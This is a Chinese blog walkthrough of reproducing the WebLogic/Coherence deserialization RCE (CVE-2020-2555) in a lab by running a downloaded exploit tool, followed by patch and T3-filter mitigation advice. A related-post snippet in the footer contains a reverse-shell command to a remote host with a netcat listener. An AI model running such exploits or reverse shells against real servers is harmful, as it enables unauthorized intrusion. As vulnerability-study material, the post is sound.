漏洞复现:WebLogic反序列化远程代码执行漏洞(cve-2020-2555)

已于 2023-07-17 18:32:57 修改
阅读量269 收藏
点赞数
文章标签: 网络安全
于 2023-07-17 18:30:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HCIEMAYU/article/details/131772020
版权

0X01 漏洞描述:

WebLogic是Oracle推出的application server,是Web应用系统必不可少的组件,其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性强、快速开发等多种特性。大多数未及时更新的Weblogic组件存在严重的漏洞,导致其成为攻击者攻击的重点目标。

0X02 影响版本

  • Oracle Coherence 3.7.1.17

  • Oracle Coherence 12.1.3.0.0

  • Oracle Coherence 12.2.1.3.0

  • Oracle Coherence 12.2.1.4.0

0X03漏洞复现

本次漏洞复现仍旧采用kali 攻击机:192.168.1.12 靶机:192.168.1.25

工具获取:ONE-FOX渗透测试集成工具箱_V1.0魔改版 by狐狸 - 🔰雨苁ℒ🔰

1、打开终端,输入update-alternatives --config java,将java版本切换至jdk1.8(如果切换不成功,用root权限尝试切换一下试试)

2、 访问http://192.168.1.25:49160

 3、进入/home/kali/Downloads/weblogic-framework-0.2.3,执行java -jar weblogic-framework-0.2.3-all-jar-with-dependencies.jar打开漏洞利用工具

4、输入URL,回显选择FileOutputStream,进行漏洞验证。

 0X04 修复建议

升级补丁,参考oracle官网发布的补丁Oracle Critical Patch Update Advisory - January 2020 如果不依赖T3协议进行JVM通信,禁用T3协议。

进入WebLogic控制台,在base_domain配置页面中,进入安全选项卡页面,点击筛选器,配置筛选器。 在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入 7001 deny t3 t3s 保存生效(需重启)

0X0800
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-2555-weblogic复现
Amdy_amdy的博客
04-14 2564
测试环境:centos6.5+weblogic12.2.1.4 攻击机:windows 10 脚本:https://github.com/wsfengfan/CVE-2020-2555 github上大佬的脚本 漏洞介绍: 一、漏洞简介 该反序列化的gadget存在与coherence包中。具体可以见分析 构造chain类似于common-collection的chain,可以照葫芦画...
weblogic-cve_2020_2555漏洞复现
0day
01-28 1847
weblogic-cve_2020_2555漏洞复现 漏洞概述: 该漏洞2020年1月在网上爆出,属于weblogic反序列化漏洞漏洞原因是Oracle Fusion中间件 Oracle Coherence 存在缺陷,攻击者可利用该漏洞在未经授权下通过构造T3协议请求,获取 Weblogic 服务器权限,执行任意命令。 漏洞复现: Vulfocus平台拉取下载启动漏洞镜像环境: 访问漏洞环境地址端口11317,该端口映射在weblogic的服务端口7001,在url地址栏输入ip端口后添加
小白实战 | weblogic的JNDI注入漏洞
最新发布
伏一
05-20 1158
由于Weblogic t3/iiop协议支持远程绑定对象bind到服务端,并且可以通过lookup查看,当远程对象继承自OpaqueReference时,lookup查看远程对象,服务端会调用远程对象getReferent方法。
CVE2020-2555漏洞分析
weixin_45540609的博客
08-05 2125
一、简介 Oracle Coherence为Oracle融合中间件中的产品,在WebLogic 12c及以上版本中默认集成到WebLogic安装包中,T3是用于在WebLogic服务器和其他类型的Java程序之间传输信息的协议。 weblogic反序列化远程命令执行漏洞CVE-2020-2555),Oracle Fusion中间件Oracle Coherence存在缺陷,攻击者可利用该漏洞再未授权情况下通过构造T3协议请求,获取weblogic服务器权限,执行任意命令。 漏洞影响情况: Oracl
Weblogic-CVE-2020-2555复现(VirtualBox虚拟机搭建)
weixin_43061533的博客
11-17 965
weblogic-cve_2020_2555复现 安装环境 靶机:一台Windows 2008 R2 服务器 攻击机:Win 10 配置环境 Jdk1.8.0_221 Weblogic 12.2.1.4.0 下载地址https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html 链接:https://pan.baidu.com/s/12Tt4Y7sXoht0RJD03f25bQ 提取码:1234 1.安装 【代码1
weblogic CVE-2020-2555 反序列化RCE 复现
qq_30302577的博客
04-01 3069
文章目录前言0x01 漏洞说明0x02 影响版本0x03 漏洞利用0x04 注意的地方0x05 修复建议0x06 时间线0x07 参考链接 前言 本教程及工具仅供技术学习交流、请勿用于非法行为、否则后果自负 0x01 漏洞说明 2020年3月6日,Oracle Coherence 反序列化远程代码执行漏洞CVE-2020-2555)的细节被公开,Oracle Coherence为Oracle融...
Weblogic CVE-2020-2551复现
热门推荐
迷风小白
06-02 1万+
0x00 前言 Weblogic IIOP 反序列化 0x01 漏洞环境 所有环境都是建立在java环境的基础上,jdk自行下载安装,本机环境jdk 1.8 环境1:vulub-weblogic-CVE-2017-10271 环境2:本地搭建Windows weblogic下载 weblogic 10.3.6安装步骤 搭建完成以后,启动weblogic访问如下图所示即为搭建成功 0x02 漏洞利用 这里我们采用环境2在本地搭建 win7:192.168.111.18(虚拟机) win10:192.168
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)
09-14
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它涉及到组件T3协议处理中的对象反序列化过程。该漏洞允许攻击者通过构造恶意的T3请求,远程执行任意代码,从而...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2628) 补丁包
08-17
Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞,这个是weblogic12.1.3.0 版本的补丁包,有需要的可以下载
CVE-2020-2551.zip
08-28
CVE-2020-2551复现
Weblogic全版本反序列化漏洞利用工具.jar
07-03
Weblogic全版本反序列化漏洞利用工具.jar
CVE-2019-2725:WebLogic不安全反序列化-CVE-2019-2725有效负载生成器和漏洞利用
04-25
CVE-2019-2725 WebLogic Universal Exploit-CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729有效负载生成器和利用信息/帮助$ python3 weblogic_exploit.py -h====================================...
Weblogic RMI-IIOP(cve-2020-2551)复现
hibari_18的博客
04-29 1456
0x01 复现 RMI方式: 1.vps 生成exp.class(示例为windows弹计算器,如果想反弹linux shell 把命令改成bash -i >& /dev/tcp/vps/4444 0>&1,然后vps用nc -lvvp 4444 监听本地端口即可,用java1.6版本编译成功率高) javac -source 1.6 -target 1.6 exp...
Weblogic IIOP协议反序列化CVE-2020-2551)漏洞复现
Boom!脑洞大爆炸的博客
11-11 2157
Weblogic IIOP协议反序列化CVE-2020-2551)复现
Weblogic IIOP反序列化漏洞CVE-2020-2551) 漏洞复现
sechelper的博客
01-11 1261
cve漏洞详细复现漏洞利用,反弹shell,工具分享
weblogic 反序列化CVE-2020-2551)漏洞复现(vulfocus)
qq_40646572的博客
04-27 2159
weblogic 反序列化CVE-2020-2551)漏洞是基于IIOP协议执行远程代码进行利用。
漫谈-Weblogic-CVE-2020-2555
Ms08067安全实验室
05-01 4686
背景 2020年1月,互联网上爆出了weblogic反序列化远程命令执行漏洞CVE-2020-2555),Oracle Fusion中间件Oracle Coherence存在缺...
CVE-2020-14644:WebLogic IIOP反序列化漏洞深度解析
为了利用这个漏洞,攻击者需要能够向WebLogic Server发送恶意的IIOP请求,这些请求包含了一个被精心设计的序列化对象,这个对象在反序列化时会调用`RemoteConstructor`,从而执行攻击者控制的代码。 为了防御此类...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值